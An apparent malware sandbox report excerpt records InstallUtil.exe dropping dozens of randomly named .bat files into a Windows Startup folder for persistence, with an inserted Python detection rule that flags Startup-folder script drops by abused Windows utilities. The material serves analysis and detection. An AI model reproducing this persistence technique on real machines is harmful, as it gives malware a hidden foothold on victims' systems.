                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2qieftJz22U9uS3rPyIxFMCy.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ftO6ibAWBETsFr4PHO0HWyVm.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OqYgLbwNH1rp6de2WyF5QSu3.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uHMiBvdm9CkTFYr0icYjiahN.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T3nGwYe0ke53Bm81uF54Won2.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V38rH4DyBbWszXs0VbJ310hH.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaVgvfbmcMYFauF5SMIvBy7w.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L5wb8yM8aV9uA3MWk0nQDV6N.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mIcfPToLUPq3gj5WqJxRDBbR.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oEONzKus0KJmxBw4v3Njwzwg.batJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ObMJW0CQyivHFgrnQOjeFbMk.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tOLiiaY6ffsKgwiVZfFcFIn0.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SQOPRbGOQslr1pMs9iyrT8Qb.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Oqdv9aQZnmchlZhQPGADj1vm.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wahfCAc9rxN7QFp93csP92wp.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Hx0sIwDO9BmAGJHgVaGYhDQe.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oNjbvmMzdD4XPQKq54zqlNic.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4gvHRByQBP5m6HuFN5n1qeo.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3hhfUEZjih0hfMNE0tjXJNip.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IN4MpOFfotqkxFDb9xG1KgQ4.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wWETG3CiojJKDjCsayXNSC4C.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4a9nVr9EEyQmaNt6aATX1FLT.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nsezr6XoeqytkgoUxSHdidst.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A59bAABCemJp5R456KFjelzs.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aG0yXFGDgm4eQ3ZK7Tgv4Q9D.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SfjQUmStVGetNiV041PzaRXb.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CuVU21KjVTi8Wd9l97IXHCaJ.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z2ZokpX7yw3dNDZbk7sMnpTY.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hDYTBIsUWgvU9DgjfmegeIG8.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dDOTNE5uA12l2ql1wlOLpcRF.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZVr8x8v8WWDz7nLkoJBAPLpU.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5NnqgyNIFXV3fkGxjwFrvTVW.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DhFzVyJl1Qh3WRl61WvkIgtg.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uHMiBvdm9CkTFYr0icYjiahN.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaVgvfbmcMYFauF5SMIvBy7w.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oEONzKus0KJmxBw4v3Njwzwg.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V4vz7ooYcwTTy9p6mMfXbhaV.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V2Ua9TLWP47cusgrbbxD2ie8.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nnz2eQ1k1PBdAfnlioMuMIp1.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VFP6UagohjQssqJ93M7nVGAA.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\S8rXbw1cOVjTK1xkd0JIGo0q.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IZ5Y7BJc8EYdvXcnIuceiXSu.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EnCs8E67uVG6Eqs33R0VMIaX.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wvf29ezu4o4eQUDaEcLfHh2i.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcqaETM5DR0YwESEQzBRnZKK.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Fbij73WE0HqnGHEPJLXCBbDZ.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9uMffQzKGugRkIptYVRImTQz.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X0SIO4n9RqqCJGm4W0OnxckQ.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xl8GqJiSNyzMP1kcdxSKb1Bh.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eJCDCqQnLPdN2iu0NZDfecsS.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NqyzZEihnfaWqCPw2h2kjWPD.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EXd58WGELkWeCynxgQPHUgBr.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4FESHHshWvY8UVRNyfERDlM3.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f8V9tkdL17zpTARbGXvubKh0.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MoodA9bUbe1XXFqshkJJ2aMi.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VnZF9b2NC7ruhyyJEaYXF7zf.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jPxMLAdrGIX6lhwANnPtfdmI.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lNPfzNqweDyCrBqs3aG9H3ld.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Raxl5XZrmvvadNCoiM9FLM1Y.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VA3T9NrhhZhF4wDb6Z4wF5ik.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jaUbcEKacTPqo4Q1E5vfMGYC.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XwXewTdG4i3reg1W4KZwDkqE.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3bJmXHWxFTLdtjfcK2Eo1CEB.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LzSfFK21XHlma9f2nC93iWKZ.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jeY2PypT42qBGgOqmE9VOHfI.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HSU3kmKANUWIev2Y6XGUJn4z.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ftO6ibAWBETsFr4PHO0HWyVm.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T3nGwYe0ke53Bm81uF54Won2.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L5wb8yM8aV9uA3MWk0nQDV6N.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JLskMOTKdJylvoD4fywb2xq9.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KCLvXEQADdAafKsEPtvKcJuW.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7CPf1BbnKQFsIHTCUVgPW2b1.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d78Ytvj4V0ta2ZiqFQElQpre.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nJ0fjaFyPdUTkd27RbJpgLbV.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tUicDr528bg57zTahAKCbWLd.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kJdsA9VA9hS9yUHHqg0ft5DV.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JqwWbmZjvUESTxkLyujvgfQ5.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gFEgarK2CmFukpJoHmXp7Y8A.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zo8clGYvUOyWdFarhfpUgMEN.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8pqQfoi3HoiRfRwXXSLOFIGm.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mQAC01IWkyy1VpnNHreKqDP9.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rxQ6BYkPciRzcYhkKHNbCVXz.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\klA8JmAQ7d3aYJKSY8AQnRqN.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vM0i9O3SmyJMeySMU7pfuQYS.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\o9mC5xW9tKlp4kRcY0ENXFVx.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QDBulKT4KjP0Dmav2rPCTbex.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\suhoeipyv9Q7WtMqEht6w8l1.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OtXKtregFQf6WT1poKNUeJKH.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JvJ8FkMpNTNcNAQ5IZH9OyrC.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aJ5ZzPIw4W4iDW4JiJvEgRVK.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\n5FvfFJp0xTBHsTUd1HtVjgf.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OYIEdBWtHabBbSeILpT9tflf.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\E5vcf50a1xrNZPss2hqKnW2D.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NRkNthlWHWKfvzr3Huo2Hk96.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0aJ4M3BmSoFSfJVoorcfM8Tu.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aRQMhYcR0xLeNlVzNud4PjhM.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Zu88srVplDcE4JudkCIsfMfK.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\3GBEpW1FZQUrWvbMjKRmSlSD.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mYqDdzubQoYo0UMqzcaWhlCq.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ocJg40zsLJKmhTN6I8MsqjRk.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2qieftJz22U9uS3rPyIxFMCy.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OqYgLbwNH1rp6de2WyF5QSu3.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\V38rH4DyBbWszXs0VbJ310hH.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mIcfPToLUPq3gj5WqJxRDBbR.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WbZbZUFbJRp9V9DhX6D6SbsF.batJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X3kzXxi5tUUbK9D3UM8FR6yB.batJump to behavior
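The behavior above (a signed .NET utility, InstallUtil.exe, writing dozens of .bat files into the per-user Startup folder) is the logon-persistence pattern a detection engineer would want to catch on an endpoint rather than only in a sandbox. The following is an added example and is not part of the Joe Sandbox report: it classifies file-creation records shaped like Sysmon Event ID 11 (the field names Image and TargetFilename are Sysmon's), flags script-type files landing directly in a Startup folder, raises severity when the writer is a Windows utility that has no business there (the SUSPICIOUS_WRITERS set is an assumption to tune per environment), and escalates again when one process drops many such files, as the report shows. The sample events are constructed; two of the file names are taken from the report, the rest are made up.

```python
import re
from collections import Counter

# A file directly inside a per-user or all-users Startup folder; the captured
# group is the file name.
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup\\([^\\]+)$", re.IGNORECASE)

# Extensions Windows runs at logon when placed in Startup.
SCRIPT_EXTS = {".bat", ".cmd", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1", ".hta", ".lnk", ".exe"}

# Assumption: signed Windows/.NET utilities that should never write to Startup.
SUSPICIOUS_WRITERS = {
    "installutil.exe", "regsvcs.exe", "regasm.exe", "msbuild.exe", "mshta.exe",
    "rundll32.exe", "regsvr32.exe", "powershell.exe", "wscript.exe", "cscript.exe",
}

# Distinct Startup files from one process before escalating to critical.
BURST_THRESHOLD = 5


def classify(event):
    """Return a finding for one FileCreate record, or None if it is not of interest."""
    match = STARTUP_RE.search(event["TargetFilename"])
    if not match:
        return None
    name = match.group(1)
    ext = name[name.rfind("."):].lower() if "." in name else ""
    if ext not in SCRIPT_EXTS:
        return None
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    severity = "high" if image in SUSPICIOUS_WRITERS else "medium"
    return {"image": image, "file": name, "ext": ext, "severity": severity,
            "target": event["TargetFilename"]}


def detect(events):
    """Classify every record, drop repeated paths (the report lists one file twice),
    and escalate writers that drop BURST_THRESHOLD or more Startup files."""
    seen = {}
    for event in events:
        finding = classify(event)
        if finding and finding["target"] not in seen:
            seen[finding["target"]] = finding
    per_image = Counter(f["image"] for f in seen.values())
    for finding in seen.values():
        if per_image[finding["image"]] >= BURST_THRESHOLD:
            finding["severity"] = "critical"
            finding["burst"] = per_image[finding["image"]]
    return list(seen.values())


STARTUP = r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
INSTALLUTIL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

# Constructed sample records. The first two file names come from the report; the
# duplicate entry mirrors the report, which lists that file twice.
SAMPLE_EVENTS = [
    {"Image": INSTALLUTIL, "TargetFilename": STARTUP + r"\ObMJW0CQyivHFgrnQOjeFbMk.bat"},
    {"Image": INSTALLUTIL, "TargetFilename": STARTUP + r"\ObMJW0CQyivHFgrnQOjeFbMk.bat"},
    {"Image": INSTALLUTIL, "TargetFilename": STARTUP + r"\tOLiiaY6ffsKgwiVZfFcFIn0.bat"},
    # made-up names standing in for the remaining drops
    {"Image": INSTALLUTIL, "TargetFilename": STARTUP + r"\constructed1.bat"},
    {"Image": INSTALLUTIL, "TargetFilename": STARTUP + r"\constructed2.bat"},
    {"Image": INSTALLUTIL, "TargetFilename": STARTUP + r"\constructed3.bat"},
    # same process writing outside Startup: not this technique
    {"Image": INSTALLUTIL, "TargetFilename": r"C:\Users\user\AppData\Local\Temp\stage.tmp"},
    # a user pinning a shortcut through Explorer looks similar but is lower confidence
    {"Image": r"C:\Windows\explorer.exe", "TargetFilename": STARTUP + r"\Notes.lnk"},
    # non-executable file in Startup: ignored
    {"Image": r"C:\Windows\explorer.exe", "TargetFilename": STARTUP + r"\desktop.ini"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(f"[{finding['severity']}] {finding['image']} -> {finding['target']}")
```

Deduplicating on the target path before counting is deliberate: sandbox and EDR both emit repeated create events for the same file, and a burst rule that counts events rather than distinct files would fire on ordinary rewrites.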
                    Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe
                    Code function: 16_2_004026E9 StartServiceCtrlDispatcherA
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                    Code function: 15_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus
                    Code function: 15_2_004241DC IsIconic,SetActiveWindow,SetFocus
